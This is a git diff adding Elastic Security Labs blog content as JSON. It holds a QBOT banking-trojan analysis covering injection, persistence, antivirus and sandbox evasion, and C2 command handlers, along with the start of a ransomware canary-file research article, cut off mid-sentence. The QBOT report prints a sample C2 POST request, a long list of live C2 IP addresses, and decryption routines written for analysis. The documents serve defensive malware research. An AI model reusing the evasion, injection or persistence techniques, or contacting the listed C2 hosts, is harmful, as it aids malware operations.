+ "id": "security_labs_content-qbot_configuration_extractor-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_malware_analysis-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_malware_analysis-md.json
new file mode 100644
index 00000000000..a071e4fc330
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-qbot_malware_analysis-md.json
@@ -0,0 +1,29 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"QBOT Malware Analysis\"\nslug: \"qbot-malware-analysis\"\ndate: \"2023-02-14\"\ndescription: \"Elastic Security Labs releases a QBOT malware analysis report covering the execution chain. From this research, the team has produced a YARA rule, configuration-extractor, and indicators of compromises (IOCs).\"\nauthor:\n - slug: cyril-francois\nimage: \"blog-thumb-drill-bit.jpg\"\ncategory:\n - slug: malware-analysis\ntags:\n - ref3726\n - qbot\n - qakbot\n---\n\n## Key takeaways\n\n- Elastic Security Labs is releasing a QBOT malware analysis report from a recent [campaign](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)\n- This report covers the execution chain from initial infection to communication with its command and control containing details about in depth features such as its injection mechanism and dynamic persistence mechanism.\n- From this research we produced a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Qbot.yar), [configuration-extractor](https://www.elastic.co/security-labs/qbot-configuration-extractor), and indicators of compromises (IOCs)\n\n## Preamble\n\nAs part of our mission to build knowledge about the most common malware families targeting institutions and individuals, the Elastic Malware and Reverse Engineering team (MARE) completed the analysis of the core component of the banking trojan QBOT/QAKBOT V4 from a previously reported [campaign](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern).\n\nQBOT — also known as QAKBOT — is a modular Trojan active since 2007 used to download and run binaries on a target machine. This document describes the in-depth reverse engineering of the QBOT V4 core components. It covers the execution flow of the binary from launch to communication with its command and control (C2).\n\nQBOT is a multistage, multiprocess binary that has capabilities for evading detection, escalating privileges, configuring persistence, and communicating with C2 through a set of IP addresses. The C2 can update QBOT, upload new IP addresses, upload and run fileless binaries, and execute shell commands.\n\nAs a result of this analysis, MARE has produced a new yara rule based on the core component of QBOT as well as a static configuration extractor able to extract and decrypt its strings, its configuration, and its C2 IP address list.\n\n> For information on the QBOT configuration extractor and malware analysis, check out our blog posts detailing this:\n>\n> - [QBOT Configuration Extractor](https://www.elastic.co/security-labs/qbot-configuration-extractor)\n> - [QBOT Attack Pattern](https://www.elastic.co/security-labs/exploring-the-qbot-attack-pattern)\n\n## Execution flow\n\nThis section describes the QBOT execution flow in the following three stages:\n\n- First Stage: Initialization\n- Second Stage: Installation\n- Third Stage: Communication\n\n### Stage 1\n\n\n\nThe sample is executed with the **regsvr32.exe** binary, which in turn will call QBOT’s **DllRegisterServer** export:\n\n\n\nAfter execution, QBOT checks if it’s running under the Windows Defender sandbox by checking the existence of a specific subdirectory titled: **C:\\\\INTERNAL\\\\\\_\\_empty** , if this folder exists, the malware terminates itself:\n\n\n\nThe malware will then enumerate running processes to detect any antivirus (AV) products on the machine. The image below contains a list of AV vendors QBOT reacts to:\n\n\n\nAV detection will not prevent QBOT from running. However, it will change its behavior in later stages. In order to generate a seed for its pseudorandom number generator (PRNG), QBOT generates a fingerprint of the computer by using the following expression:\n\n```\n**fingerprint = CRC32(computerName + CVolumeSerialNumber + AccountName)**\n```\n\nIf the **“C:”** volume doesn’t exist the expression below is used instead:\n\n```\n**fingerprint = CRC32(computerName + AccountName)**\n```\n\nFinally, QBOT will choose a set of targets to inject into depending on the AVs previously detected and the machine architecture:\n\n| | |\n| -------------------------- | ------------------------------------------------------------------------------------------------------------- | ---------------------- | ----------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------ | ------------------------------------------------------------------------ |\n| AV detected & architecture | Targets |\n| BitDefender | Kaspersky | Sophos | TrendMicro | & x86 | %SystemRoot%\\\\SysWOW64\\\\mobsync.exe %SystemRoot%\\\\SysWOW64\\\\explorer.exe |\n| BitDefender | Kaspersky | Sophos | TrendMicro & x64 | %SystemRoot%\\\\System32\\\\mobsync.exe%SystemRoot%\\\\explorer.exe%ProgramFiles%\\\\Internet Explorer\\\\iexplore.exe |\n| Avast | AVG | Windows Defender & x86 | %SystemRoot%\\\\SysWOW64\\\\OneDriveSetup.exe%SystemRoot%\\\\SysWOW64\\\\msra.exe%ProgramFiles(x86)%\\\\Internet Explorer\\\\iexplore.exe |\n| Avast | AVG | Windows Defender & x64 | %SystemRoot%\\\\System32\\\\OneDriveSetup.exe%SystemRoot%\\\\System32\\\\msra.exe |\n| x86 | '%SystemRoot%\\\\explorer.exe%SystemRoot%\\\\System32\\\\msra.exe%SystemRoot%\\\\System32\\\\OneDriveSetup.exe |\n| x64 | %SystemRoot%\\\\SysWOW64\\\\explorer.exe%SystemRoot%\\\\SysWOW64\\\\msra.exe%SystemRoot%\\\\System32\\\\OneDriveSetup.exe |\n\nQBOT will try to inject itself iteratively, using its second stage as an entry point, into one of its targets– choosing the next target process if the injection fails. Below is an example of QBOT injecting into **explorer.exe**.\n\n\n\n### Stage 2\n\n\n\nQBOT begins its second stage by saving the content of its binary in memory and then corrupting the file on disk:\n\n\n\nThe malware then loads its configuration from one of its resource sections:\n\n\n\nQBOT also has the capability to load its configuration from a **.cfg** file if available in the process root directory:\n\n\n\nAfter loading its configuration, QBOT proceeds to install itself on the machine– initially by writing its internal configuration to the registry:\n\n\n\nShortly after, QBOT creates a persistence subdirectory with a randomly-generated name under the **%APPDATA%\\Microsoft** directory. This folder is used to drop the in-memory QBOT binary for persistence across reboot:\n\n\n\nAt this point, the folder will be empty because the malware will only drop the binary if a shutdown/reboot event is detected. This “contingency” binary will be deleted after reboot.\n\nQBOT will attempt the same install process for all users and try to either execute the malware within the user session if it exists, or create a value under the **CurrentVersion\\Run** registry key for the targeted user to launch the malware at the next login. Our analysis didn’t manage to reproduce this behavior on an updated Windows 10 machine. The only artifact observed is the randomly generated persistence folder created under the user **%APPDATA%\\Microsoft** directory:\n\n\n\nQBOT finishes its second stage by restoring the content of its corrupted binary and registering a task via **Schtask** to launch a QBOT service under the **NT AUTHORITY\\SYSTEM** account.\n\nThe first stage has a special execution path where it registers a service handler if the process is running under the **SYSTEM** account. The QBOT service then executes stages 2 and 3 as normal, corrupting the binary yet again and executing commands on behalf of other QBOT processes via messages received through a randomly generated named pipe:\n\n\n\n### Stage 3\n\n\n\nQBOT begins its third stage by registering a window and console event handler to monitor suspend/resume and shutdown/reboot events. Monitoring these events enables the malware to install persistence dynamically by dropping a copy of the QBOT binary in the persistence folder and creating a value under the **CurrentVersion\\Run** registry key:\n\n\n\nAt reboot, QBOT will take care of deleting any persistence artifacts.\n\nThe malware will proceed to creating a watchdog thread to monitor running processes against a hardcoded list of binaries every second. If any process matches, a registry value is set that will then change QBOT behavior to use randomly generated IP addresses instead of the real one, thus never reaching its command and control:\n\n| | | |\n| ------------------------------------------------------------------------------------------------------------------------------------------------------------------------ | ----------------------------------------------------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| frida-winjector-helper-32.exefrida-winjector-helper-64.exeTcpdump.exewindump.exeethereal.exewireshark.exeettercap.exertsniff.exepacketcapture.execapturenet.exeqak_proxy | dumpcap.exeCFF Explorer.exenot_rundll32.exeProcessHacker.exetcpview.exefilemon.exeprocmon.exeidaq64.exePETools.exeImportREC.exeLordPE.exe | SysInspector.exeproc_analyzer.exesysAnalyzer.exesniff_hit.exejoeboxcontrol.exejoeboxserver.exeResourceHacker.exex64dbg.exeFiddler.exesniff_hit.exesysAnalyzer.exe |\n\nQBOT will then load its domains from one of its **.rsrc** files and from the registry as every domain update received from its C2 will be part of its configuration written to the registry. See Extracted Network Infrastructure in Appendix A.\n\nFinally, the malware starts communicating with C2 via HTTP and TLS. The underlying protocol uses a JSON object encapsulated within an enciphered message which is then base64-encoded:\n\n\n\nBelow an example of a HTTP POST request sent by QBOT to its C2:\n\n```\nAccept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko\nHost: 181.118.183.98\nContent-Length: 77\nCache-Control: no-cache\n\nqxlbjrbj=NnySaFAKLt+YgjH3UET8U6AUwT9Lg51z6zC+ufeAjt4amZAXkIyDup74MImUA4do4Q==\n```\n\nThrough this communication channel, QBOT receives commands from C2 — see Appendix B (Command Handlers). Aside from management commands (update, configuration knobs), our sample only handles binary execution-related commands, but we know that the malware is modular and can be built with additional features like a VNC server, a reverse shell server, proxy support (to be part of the domains list), and numerous other capabilities are feasible.\n\n## Features\n\n### Mersenne Twister Random Number Generator\n\nQBOT uses an implementation of [Mersenne Twister Random Number Generator](https://www.sciencedirect.com/topics/computer-science/mersenne-twister) (MTRNG) to generate random values:\n\n\n\nThe MTRNG engine is then used by various functions to generate different types of data, for example for generating registry key values and persistence folders. As QBOT needs to reproduce values, it will almost always use the computer fingerprint and a “salt” specific to the value it wants to generate:\n\n\n\n### String obfuscation\n\nAll QBOT strings are XOR-encrypted and concatenated in a single blob we call a “string bank”. To get a specific string the malware needs a string identifier (identifier being an offset in the string bank), a decryption key, and the targeted string bank.\n\n\n\nAs this sample has two string banks, it has four **GetString**' functions currying the string bank and the decryption key parameters: One C string function and one wide string function for each string bank. Wide string functions use the same string banks, but convert the data to **utf-16**.\n\n\n\n\n\nSee Appendix C (String Deciphering Implementation).\n\n### Import obfuscation\n\nQBOT resolves its imports using a hash table:\n\n\n\n\n\nThe malware resolves the library name through its GetString function and then resolves the hash table with a classic library’s exports via manual parsing, comparing each export to the expected hash. In this sample, the hashing comparison algorithm use this formula:\n\n```\n**CRC32(exportName) XOR 0x218fe95b == hash**\n```\n\n### Resource obfuscation\n\nThe malware is embedded with different resources, the common ones are the configuration and the domains list. Resources are encrypted the same way: The decryption key may be either embedded within the data blob or provided. Once the resource is decrypted, an embedded hash is used to check data validity.\n\n\n\nSee Appendix D (Resource Deciphering Implementation).\n\n### Cyrillic keyboard language detection\n\nAt different stages, QBOT will check if the computer uses a Cyrillic language keyboard. If it does, it prevents further execution.\n\n\n\n### AVG/AVAST special behavior\n\nAVG and Avast share the same antivirus engine. Thus if QBOT detects one of those antivirus running, it will also check at the installation stage if one of their DLLs is loaded within the malware memory space. If so, QBOT will skip the installation phase.\n\n\n\n### Windows Defender special behavior\n\nIf QBOT is running under **SYSTEM** account, it will add its persistence folder to the Windows Defender exclusion path in the registry. It will also do this for the legacy Microsoft Security Essential (MSE) exclusion path if detected.\n\n\n\n### Exception list process watchdog\n\nEach second, QBOT parses running processes looking for one matching the hardcoded exception list. If any is found, a “fuse” value is set in the registry and the watchdog stops. If this fuse value is set, QBOT will not stop execution– but at the third stage, the malware will use randomly generated IP and won't be able to contact C2.\n\n\n\n![QBOT using randomly generated IP address if fuse is set]/assets/images/qbot-malware-analysis/1qbot.png)\n\n### QBOT process injection\n\n#### Second stage injection\n\nTo inject its second stage into one of a hardcoded target, QBOT uses a classic **CreateProcess** , **WriteProcessMemory** , **ResumeProcess** DLL injection technique. The malware will create a process, allocate and write the QBOT binary within the process memory, write a copy of its engine, and patch the entry point to jump to a special function. This function performs a light initialization of QBOT and its engine within the new process environment, alerts the main process of its success, and then execute the second stage.\n\n![QBOT second stage injection]/assets/images/qbot-malware-analysis/2qbot.png)\n\n![QBOT injection entry point]/assets/images/qbot-malware-analysis/3qbot.jpg)\n\n#### Injecting library from command and control\n\nQBOT uses the aforementioned method to inject libraries received from C2. The difference is that as well as mapping itself, the malware will also map the received binary and use a library loader as entry point.\n\n![QBOT DLL loader injection]/assets/images/qbot-malware-analysis/4qbot.jpg)\n\n\n\n### Multi-user installation\n\nPart of the QBOT installation process is installing itself within others users’ accounts. To do so, the malware enumerates each user with an account on the machine (local and domain), then dumps its configuration under the user’s **Software\\Microsoft** registry key, creates a persistence folder under the users’ **%APPDATA%\\Microsoft** folder, and finally tries to either launch QBOT under the user session if the session exist, or else creates a run key to launch the malware when the user will log in.\n\n\n\n### Dynamic persistence\n\nQBOT registers a window handler to monitor suspend/resume events. When they occur, the malware will install/uninstall persistence.\n\n![QBOT window handler registration]/assets/images/qbot-malware-analysis/7qbot.png)\n\n![QBOT window handler catching suspend/resume event]/assets/images/qbot-malware-analysis/8qbot.png)\n\nQBOT registers a console event to handle shutdown/reboot events as well.\n\n\n\n\n\n### Command and control public key pinning\n\nQBOT has a mechanism to verify the signature of every message received from its command and control. The verification mechanism is based on a public key embedded in the sample. This public key could be used to identify the campaign the sample belongs to, but this mechanism may not always be present.\n\n![QBOT command and control message processing]/assets/images/qbot-malware-analysis/1qbot.png)\n\n![Message signature verification with hardcoded command and control public key]/assets/images/qbot-malware-analysis/2qbot.png)\n\nThe public key comes from a hardcoded XOR-encrypted data blob.\n\n![Hardcoded command and control public key being XOR-decrypted]/assets/images/qbot-malware-analysis/3qbot.jpg)\n\n### Computer information gathering\n\nPart of QBOT communication with its command and control is sending information about the computer. Information are gathered through a set Windows API calls, shell commands and Windows Management Instrumentation (WMI) commands:\n\n![Computer information gathering 1/2]/assets/images/qbot-malware-analysis/4qbot.jpg)\n\n\n\nOne especially interesting procedure listed installed antivirus via WMI:\n\n\n\n### Update mechanism\n\nQBOT can receive updates from its command and control. The new binary will be written to disk, executed through a command line, and the main process will terminate.\n\n![QBOT writing to disk and running the updated binary]/assets/images/qbot-malware-analysis/7qbot.png)\n\n![QBOT stopping execution if update is running]/assets/images/qbot-malware-analysis/8qbot.png)\n\n### Process injection manager\n\nQBOT has a system to keep track of processes injected with binaries received from its command and control in order to manage them as the malware receives subsequent commands. It also has a way to serialize and save those binaries on disk in case it has to stop execution and recover execution when restarted.\n\nTo do this bookkeeping, QBOT maintains two global structures — a list of all binaries received from its command and control, and a list of running injected processes:\n\n\n\n\n\n## Conclusion\n\nThe QBOT malware family is highly active and still part of the threat landscape in 2022 due to its features and its powerful modular system. While initially characterized as an information stealer in 2007, this family has been leveraged as a delivery mechanism for additional malware and post-compromise activity.\n\nElastic Security provides out-of-the-box prevention capabilities against this threat. Existing Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/free#quick-starts) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals). You can always get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration?elektra=whats-new-elastic-security-7-16-blog).\n\n## MITRE ATT&CK Tactics and Techniques\n\nMITRE ATT&CK is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.\n\n### Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action.\n\n- Tactic: [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)\n- Tactic: [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- Tactic: [Discovery](https://attack.mitre.org/tactics/TA0007)\n- Tactic: [Command and Control](https://attack.mitre.org/tactics/TA0011)\n\n### Techniques / Sub Techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action.\n\n- Technique: [Process Injection](https://attack.mitre.org/techniques/T1055) (T1055)\n- Technique: [Modify Registry](https://attack.mitre.org/techniques/T1112) (T1112)\n- Technique: [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) (T1027)\n- Technique: [Obfuscated Files or Information: Indicator Removal from Tools](https://attack.mitre.org/techniques/T1027/005) (T1027.005)\n- Technique: [System Binary Proxy Execution: Regsvr32](https://attack.mitre.org/techniques/T1218/010) (T1218.010) \n Technique: [Application Window Discovery](https://attack.mitre.org/techniques/T1010) (T1010)\n- Technique: [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) (T1083)\n- Technique: [System Information Discovery](https://attack.mitre.org/techniques/T1082) (T1082)\n- Technique: [System Location Discovery](https://attack.mitre.org/techniques/T1614) (T1614)\n- Technique: [Software Discovery: Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) (T1518.001)\n- Technique: [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) (T1033)\n- Technique: [Application Layer Protocol: Web Protocols](https://attack.mitre.org/techniques/T1071/001) (T1071.001)\n\n## Observations\n\nWhile not specific enough to be considered indicators of compromise, the following information was observed during analysis that can help when investigating suspicious events.\n\n### File System\n\n**Persistence folder**\n\n```\n**%APPDATA%\\Microsoft\\[Random Folder]**\n```\n\n**Example:**\n\n```\n**C:\\Users\\Arx\\AppData\\Roaming\\Microsoft\\Vuhys**\n```\n\n### Registry\n\n**Scan Exclusion**\n\n```\n**HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\[Persistence Folder]**\n```\n\n**Example:**\n\n```\n**HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths\\C:\\Users\\Arx\\AppData\\Roaming\\Microsoft\\Blqgeaf**\n```\n\n### Configuration\n\n**Configuration**\n\n```\n**HKU\\[User SID]\\Software\\Microsoft\\[Random Key]\\[Random Value 0]**\n```\n\n**Example:**\n\n```\n**HKU\\S-1-5-21-2844492762-1358964462-3296191067-1000\\Software\\Microsoft\\Silhmfua\\28e2a7e8**\n```\n\n## Appendices\n\n### Appendix A (extracted network infrastructure)\n\n| | | |\n| ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |\n| 1.161.71.109:4431.161.71.109:995100.1.108.246:443101.50.103.193:995102.182.232.3:995103.107.113.120:443103.139.243.207:990103.246.242.202:443103.87.95.133:2222103.88.226.30:443105.226.83.196:995108.60.213.141:443109.12.111.14:443109.228.220.196:443113.11.89.165:995117.248.109.38:21120.150.218.241:995120.61.2.95:443121.74.167.191:995125.168.47.127:2222138.204.24.70:443140.82.49.12:443140.82.63.183:443140.82.63.183:995143.0.34.185:443144.202.2.175:443144.202.2.175:995144.202.3.39:443144.202.3.39:995148.64.96.100:443149.28.238.199:443149.28.238.199:995172.114.160.81:995172.115.177.204:2222173.174.216.62:443173.21.10.71:2222174.69.215.101:443175.145.235.37:443176.205.119.81:2078176.67.56.94:443176.88.238.122:995179.158.105.44:443180.129.102.214:995180.183.128.80:2222181.118.183.98:443181.208.248.227:443181.62.0.59:443182.191.92.203:995182.253.189.74:2222185.69.144.209:443 | 186.105.121.166:443187.102.135.142:2222187.207.48.194:61202187.250.114.15:443187.251.132.144:22190.252.242.69:443190.73.3.148:2222191.17.223.93:32101191.34.199.129:443191.99.191.28:443196.233.79.3:80197.167.62.14:993197.205.127.234:443197.89.108.252:4432.50.137.197:443201.145.189.252:443201.211.64.196:2222202.134.152.2:2222203.122.46.130:443208.107.221.224:443209.197.176.40:995217.128.122.65:2222217.164.210.192:443217.165.147.83:99324.178.196.158:222224.43.99.75:44331.35.28.29:44331.48.166.122:207832.221.224.140:99537.186.54.254:99537.34.253.233:44338.70.253.226:222239.41.158.185:99539.44.144.159:99539.52.75.201:99539.57.76.82:99540.134.246.185:99541.228.22.180:44341.230.62.211:99341.38.167.179:99541.84.237.10:99542.235.146.7:222245.241.232.25:99545.46.53.140:222245.63.1.12:44345.63.1.12:99545.76.167.26:44345.76.167.26:99545.9.20.200:44346.107.48.202:443 | 47.156.191.217:44347.180.172.159:44347.180.172.159:5001047.23.89.62:99347.23.89.62:9955.32.41.45:4435.95.58.211:208766.98.42.102:44367.209.195.198:44368.204.7.158:44370.46.220.114:44370.51.138.126:222271.13.93.154:222271.74.12.34:44372.12.115.90:2272.252.201.34:99572.76.94.99:44373.151.236.31:44373.67.152.98:222274.15.2.252:222275.113.214.234:222275.99.168.194:44375.99.168.194:6120176.169.147.192:3210376.25.142.196:44376.69.155.202:222276.70.9.169:222278.87.206.213:99580.11.74.81:222281.215.196.174:44382.152.39.39:44383.110.75.97:222284.241.8.23:3210385.246.82.244:44386.97.11.43:44386.98.208.214:222286.98.33.141:44386.98.33.141:99588.228.250.126:44389.211.181.64:222290.120.65.153:207891.177.173.10:99592.132.172.197:222293.48.80.198:99594.36.195.250:222294.59.138.62:119494.59.138.62:222296.21.251.127:222296.29.208.97:44396.37.113.36:993 |\n\n### Appendix B (command handlers)\n\n| Id | Handler |\n| ---- | ------------------------------------------------------------------------------- |\n| 0x1 | MARE::rpc::handler::CommunicateWithC2 |\n| 0x6 | MARE::rpc::handler::EnableGlobalRegistryConfigurationValuek0x14 |\n| 0x7 | MARE::rpc::handler::DisableGlobalRegistryConfigurationValuek0x14 |\n| 0xa | MARE::rpc::handler::KillProcess |\n| 0xc | MARE::rpc::handler::SetBunchOfGlobalRegistryConfigurationValuesAndTriggerEvent1 |\n| 0xd | MARE::rpc::handler::SetBunchOfGlobalRegistryConfigurationValuesAndTriggerEvent0 |\n| 0xe | MARE::rpc::handler::DoEvasionMove |\n| 0x12 | MARE::rpc::handler::NotImplemented |\n| 0x13 | MARE::rpc::handler::UploadAndRunUpdatedQBOT0 |\n| 0x14 | MARE::rpc::handler::Unk0 |\n| 0x15 | MARE::rpc::handler::Unk1 |\n| 0x19 | MARE::rpc::handler::UploadAndExecuteBinary |\n| 0x1A | MARE::rpc::handler::UploadAndInjectDll0 |\n| 0x1B | MARE::rpc::handler::DoInjectionFromDllToInjectByStr |\n| 0x1C | MARE::rpc::handler::KillInjectedProcessAndDisableDllToInject |\n| 0x1D | MARE::rpc::handler::Unk3 |\n| 0x1E | MARE::rpc::handler::KillInjectedProcessAndDoInjectionAgainByStr |\n| 0x1F | MARE::rpc::handler::FastInjectdll |\n| 0x21 | MARE::rpc::handler::ExecuteShellCmd |\n| 0x23 | MARE::rpc::handler::UploadAndInjectDll1 |\n| 0x24 | MARE::rpc::handler::UploadAndRunUpdatedQBOT1 |\n| 0x25 | MARE::rpc::handler::SetValueToGlobalRegistryConfiguration |\n| 0x26 | MARE::rpc::handler::DeleteValueFromGlobalRegistryConfiguration |\n| 0x27 | MARE::rpc::handler::ExecutePowershellCmd |\n| 0x28 | MARE::rpc::handler::UploadAndRunDllWithRegsvr32 |\n| 0x29 | MARE::rpc::handler::UploadAndRunDllWithRundll32 |\n\n### Appendix C (string deciphering implementation)\n\n```\ndef decipher_strings(data: bytes, key: bytes) -> bytes:\n result = dict()\n current_index = 0\n current_string = list()\n for i in range(len(data)):\n current_string.append(data[i] ^ key[i % len(key)])\n if data[i] == key[i % len(key)]:\n result[current_index] = bytes(current_string)\n current_string = list()\n current_index = i + 1\n return result\n```\n\n### Appendix D (resource deciphering implementation)\n\n```\nfrom Crypto.Cipher import ARC4\nfrom Crypto.Hash import SHA1\n\ndef decipher_data(data: bytes, key: bytes) -> tuple[bytes, bytes]:\n data = ARC4.ARC4Cipher(SHA1.SHA1Hash(key).digest()).decrypt(data)\n return data[20:], data[:20]\n\n\ndef verify_hash(data: bytes, expected_hash: bytes) -> bool:\n return SHA1.SHA1Hash(data).digest() == expected_hash\n\n\ndef decipher_rsrc(rsrc: bytes, key: bytes) -> bytes:\n deciphered_rsrc, expected_hash = decipher_data(rsrc[20:], rsrc[:20])\n if not verify_hash(deciphered_rsrc, expected_hash):\n deciphered_rsrc, expected_hash = decipher_data(rsrc, key)\n if not verify_hash(deciphered_rsrc, expected_hash):\n raise RuntimeError('Failed to decipher rsrc: Mismatching hashes.')\n return deciphered_rsrc\n```\n"
+ },
+ "title": "QBOT Malware Analysis",
+ "slug": "qbot-malware-analysis",
+ "date": "2023-02-14",
+ "description": "Elastic Security Labs releases a QBOT malware analysis report covering the execution chain. From this research, the team has produced a YARA rule, configuration-extractor, and indicators of compromises (IOCs).",
+ "author": [
+ {
+ "slug": "cyril-francois"
+ }
+ ],
+ "image": "blog-thumb-drill-bit.jpg",
+ "category": [
+ {
+ "slug": "malware-analysis"
+ }
+ ],
+ "tags": [
+ "ref3726",
+ "qbot",
+ "qakbot"
+ ]
+ },
+ "id": "security_labs_content-qbot_malware_analysis-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md.json
new file mode 100644
index 00000000000..131159ed3cc
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-ransomware_in_the_honeypot_how_we_capture_keys-md.json
@@ -0,0 +1,32 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Ransomware in the honeypot: how we capture keys with sticky canary files\"\nslug: \"ransomware-in-the-honeypot-how-we-capture-keys\"\ndate: \"2024-02-23\"\ndescription: \"This article describes the process of capturing encryption keys from ransomware using Elastic Defend ransomware protection.\"\nauthor:\n - slug: salim-bitam\n - slug: christophe-alladoum\nimage: \"photo-edited-07.png\"\ncategory:\n - slug: security-research\ntags: \n - ransomware\n - canary\n - honeypot\n---\n\n## TL;DR\n\n\n\n\nAt Elastic, we have bi-annual ON Weeks, where engineers break into “hack-a-thon” teams to tackle a technical challenge voted on by the team. This article presents the outcome of [yet another](https://www.elastic.co/security-labs/deep-dive-into-the-ttd-ecosystem) Elastic ON Week, where we delved into an innovative application of Elastic Endpoint ransomware protection. Our research used our existing ransomware canary protection, deployed since 7.14, to generate memory snapshots (i.e., data collections that record process information) of the process(es) identified as ransomware. Through analysis of these snapshots, our research illustrated how we could recover critical information for the forensics process and even encryption keys, allowing for complete decryption.\n\nThis process memory snapshotting mechanism was added starting with Elastic Defend 8.11, allowing DFIR teams to find memory dumps of ransomware flagged by our ransomware protection, all within Elastic Endpoint’s secure installation folder (by default, ```$ElasticInstallPath\\Endpoint\\cache\\RansomwareDumps```). \n\n## Introduction\n\nIn 2024, we don't need to explain what ransomware is or the multibillion-dollar industry it's become or explain how even companies with unlimited budgets struggle to contain or prevent it. These adversaries are mature and efficient, often outpacing security functions like forensic and malware analysis.\n\n### Current state of protection\n\nThankfully, over the years, AVs/EDRs have become increasingly better at detecting and preventing ransomware. Among the most common existing mitigations, we find: \n\n - Static and dynamic detection by signatures: this is usually performed at various levels (through hashes at a file or ELF/PE section level) and file activity (write access to files with high entropy changes) has the advantage of being easily and rapidly implemented, but are also likely to generate false positives \n - Reverse engineering: Reversing binaries can expose new ways to interfere with execution, as malware authors implement OS-level fail-safes (for instance, through Mutant objects) and/or network fail-safes (like WANNACRY) \n - Recovery backups: These are not always thoroughly tested, and even if they’re working there is a risk of data loss between the last backup and the moment of infection \n - Shadow copies: Somewhat similar to recovery backups, ransomware usually actively locates and attempts to destroy them prior to encrypting files on a system \n - High entropy and rapid file change: This approach is purely experimental and attempts to detect drastic changes in the file content as an indicator of encryption, however, this is also very false positive (FP) prone\n - Last cryptography weakness: By far the most complex mitigation, as it requires reverse engineering and cryptographic knowledge, but also luck as adversaries hope that the author rolls their own crypto API (see Elastic's Mark Mager [2019 DEFCON talk](https://youtu.be/0TF9NLsGCHA) for some examples); this approach can’t work against modern OS native cryptographic APIs as long as they’re properly implemented according to documentation\n\n### How ransomware (usually) works, and why it matters\n\nIt is imperative that we know both what we're protecting against and how it internally operates to be effective. This diverse nature underlines that there may never be a universal solution to combat all ransomware strains. Understanding this diversity also emphasizes the importance of our technique, which provides significant insights about ransomware.\n\nFrom a high level, the sequence of actions that ransomware executes is usually summarized as such:\n\n 1. **Delivery**: this can be done in several ways, from social engineering to 0-day/1-day vulnerability exploitation. This approach can also rely on weak passwords to remotely infect targets.\n 2. **C2 Communication**: once the execution starts, the ransomware may communicate with the C2 to exchange configuration and share information about the victim. This step can also leave room for the C2 to have a kill switch in place, preventing further infection\n 3. **Encryption**: after establishing a cryptographic context, the process recursively browses the file system, looks for files with specific extensions, and encrypts them.\n 4. **Extortion**: after sharing the decryption keys with the C2, the ransomware will drop a ransom note and (usually very visibly) notify the infected user of its actions and ways to obtain the decryption key. At that point, all cryptographic context allowing recovery may already be lost \n 5. **Propagation**: if possible, the ransomware may try to infect more systems automatically.\n\nHowever, looking at it at a lower level reveals that ransomware operates quite uniquely: for example, focusing on the delivery step, the notorious [WANNACRY ransomware](https://www.cisa.gov/sites/default/files/FactSheets/NCCIC%20ICS_FactSheet_WannaCry_Ransomware_S508C.pdf) spread via a vulnerability in the Windows operating system, known as [EternalBlue](https://arstechnica.com/information-technology/2017/04/nsa-leaking-shadow-brokers-just-dumped-its-most-damaging-release-yet/); whereas [LOCKBIT](https://malpedia.caad.fkie.fraunhofer.de/details/win.lockbit) variants tend to infect using phishing emails, exploit kits, or by leveraging compromised Remote Desktop Protocol (RDP) credentials. \n\nDuring this research, it was mostly the 3rd step that interested us as it is usually where detection and prevention can be most effective, such as with our canary protection.\n\n### Understanding the Canary files feature in Elastic Endpoint \n\nOriginating in Elastic 7.14, Elastic Endpoint ransomware protection uses [canary 